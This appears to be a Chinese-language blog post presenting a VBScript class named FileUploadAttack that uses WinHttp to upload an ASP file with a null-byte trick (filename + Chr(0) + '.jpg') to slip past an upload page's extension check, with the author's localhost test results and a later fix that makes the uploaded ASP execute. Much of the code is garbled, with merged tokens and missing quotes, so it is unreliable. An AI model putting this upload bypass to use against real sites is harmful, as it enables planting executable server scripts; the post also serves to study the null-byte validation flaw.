本文部分腳本具有攻擊性,僅供學習研究用,請用在合法合理範圍內,對造成的損失本人不承擔責任,本人也不提供黑客攻擊技術指導
今天Demon 提到了這個問題,正好想到之前看到的一篇文章《Automatic file upload using IE+ADO without user interaction - VBSscript》。這篇文章給出了本地無交互自動上傳腳本的示例,正好今天可以藉來一用,原腳本利用了InternetExplorer.Application組件,我改寫了一下,用WinHttp.WinHttpRequest.5.1實現了類似的功能,關於這個元件更多的用法請參考《WinHttpRequest Object Reference》。
複製程式碼如下:Option Explicit
Function file_get_contents(filename)
Dim fso, f
Set fso = WSH.CreateObject(Scripting.FilesystemObject)
Set f = fso.OpenTextFile(filename, 1)
file_get_contents = f.ReadAll
f.Close
Set f = Nothing
Set fso = Nothing
End Function
'程式碼修改自http://www.motobit.com/tips/detpg_uploadvbsie/
Class FileUploadAttack
Private m_objWinHttp
Private m_strUrl
Private m_strFieldName
Private Sub Class_Initialize()
Set m_objjet m_strFieldName
PrivateSub
Class_Initialize()
值Private Sub Class_Terminate()
Set m_objWinHttp = Nothing
End Sub
Public SubsetUrl
(url)
m_strUrl = url
End Sub
Public Sub setFieldName(name)
m_strFieldName
= name
End Sub
'Infrormations In form field header.Function
MPTemplate 'template For multipart header
MPTemplate = Content-Disposition: form-data; name={field}; + _
filename={file} + vbCrLf + _
Content-Type: {ct} + vbCrLf + vbCrLf
Dim Out
Out = Replace(MPTemplate, { field}, FieldName)
Out = Replace(Out, {file}, FileName)
mpFields = Replace(Out, {ct}, ContentType)
End Function
'Converts OLE string To multibyte string
Function StringToMB(S)
Dim I, B
For I = 1 To Len(S)
B = B & ChrB(Asc(Mid(S, I, 1)) )
Next
StringToMB = B
End Function
'Build multipart/form-data document with file contents And header info
Function BuildFormData(FileContents, Boundary, _
FileName, FieldName)
Dim FormData, Pre, Po
Const ContentType = application/upload
'The two parts around file contents In the multipart-form data.
Premp -- + Boundary + vielLf FieldName, _
FileName, ContentType)
Po = vbCrLf + -- + Boundary + -- + vbCrLf
'Build form data using recordset binary field
Const adLongVarBinary = 205
Dim RS: Set RS = WSH.CreateObject(ADODB.Recordset)
RS.Field.Appreend b,
L. ) + LenB(FileContents) + Len(Po)
RS.Open
RS.AddNew
Dim LenData
'Convert Pre string value To a binary data
LenData = Len(Pre)
RS(b).AppendChunk (StringToMB(Pre) & ChrB(0))
Pre = RS(b) .GetChunk(LenData)
RS(b) =
'Convert Po string value To a binary data
LenData = Len(Po)
RS(b).AppendChunk (StringToMB(Po) & ChrB(0))
Po = RS(b).GetChunk(LenData)
RS(b) =
'Join Pre + FileContents + Po binary data
RS(b).AppendChunk (Pre )
RS(b).AppendChunk (FileContents)
RS(b).AppendChunk (Po)
RS.Update
FormData = RS(b)
RS.Close
BuildFormData = FormData
End Function
Public Function sendFile(fileName)
Const Boundary = ---------------------------0123456789012
m_objWinHttp.Open POST, m_strUrl, False
m_objWinHttp.setRequestHeader Content-Type, _
multipart/form-data; boundary= + Boundary
Dim FileContents, FormData
'Get source file As a binary data.
FileContents = file_get_contents(FileName)
' 以下建構了惡意檔案副檔名Chr(0) & .jpg
'Build multipart/form-data document
FormData = BuildFormData(FiledFormd
FileName & Chr(0) & .jpg, m_strFieldName)
m_objWinHttp.send FormData
sendFile = m_objWinHttp.Status
End Function
Public Function getText()
getText
=
m_objWinHttp.ResponseText
End
Function
End Class
Function VBMain(
)需要修改下面內容為適當內容
' 上傳url
fileUpload.setUrl http://localhost/upload/uploadfile.asp
fileUpload.setFieldName filepath ' 上傳表單框的name
' 需上傳檔案路徑
If fileUpload.sendFile(E:/projects/asp /index.asp)=200 Then
MsgBox 上傳成功& fileUpload.getText()
Else
MsgBox 失敗
End If
Set fileUpload = Nothing
End Function
Call WScript.Quit(VBMain())
上傳功能是隨便在網上找的一個簡單上傳ASP文件,然後加入我在文章中《ASP/VBScript中CHR(0)的由來以及帶來的安全問題》所述的GetFileExtensionName判斷副檔名是否為jpg。
測試結果是:手動上傳asp,失敗;利用上述攻擊腳本上傳asp文件,成功!在上傳目錄中確實是asp文件,透過瀏覽器URL也能存取這個asp文件,只是奇怪的是顯示一片空白,我這裡是IIS 7,難道是IIS版本問題,或許是file_get_contents應該回傳文件的二進位流?好了,這個問題先擱在這兒,還有其他事,先閃了。
所有實驗碼包,在這裡upload.zip(代碼BUG參考下面更新說明)下載。
2011年12月25日更新
根據大家回饋的上傳檔案變成Unicode Little Endian編碼問題,首先抱歉的是當時確實偷懶了,主要代碼參考的老外的,而且老外說明了一下GetFile這個函數獲取文件二進制數據,沒找到這個函數實現,也懶得去弄二進制讀取,直接搞了個file_get_contents取得文字數據,事實證明這樣確實存在問題,下面我把補救措施說明一下吧,還是偷懶一下,直接在現有的基礎上將文字資料轉換為二進位資料。使用ADODB.Stream元件,函數如下:
複製程式碼如下:
' 將指定charset的字串str轉換為二進位
Function strtobin(str, charset)
With WSH.CreateObject(ADODB.Stream)
.Type = 2
.Mode = 3
. Open
.Charset = charset
.WriteText str
.Flush
.Position = 0
.Type = 1
strtobin = .Read()
.Close
End With
End Function
接著將上述程式碼的第106行改成下面這樣(以ASCII讀取文字):
複製程式碼如下:
FileContents = strtobin(file_get_contents(FileName), ASCII)
這樣改過後上傳的ASP文件就是普通編碼的文件了,然後瀏覽器存取這個文件,可以看到該ASP成功解析。
不過這裡覺得囉嗦了一點,其實可以直接以二進位開啟檔案並回傳數據,這裡進行了兩步:1.以文字方式讀取檔案;2.將文字轉換為二進位資料。一步到位的程式碼可以參考下面一次以二進位Byte
()方式讀取
檔案資料的函數:複製程式碼程式碼如下:
'Returns file contents As a
binary data Function GetFile(FileName)Dim Stream: Set Stream = CreateObject(ADODB.Stream )
Stream.Type = 1 'Binary
Stream.Open
Stream.LoadFromFile FileName
GetFile = Stream.Read
Stream.Close
Set Stream = Nothing
End Function
更優化的程式碼我就不寫了,主要說明的是一個上傳思路,如果大家希望得到完善的上傳實現,可以參考Demon的《VBS模擬POST上傳文件》 。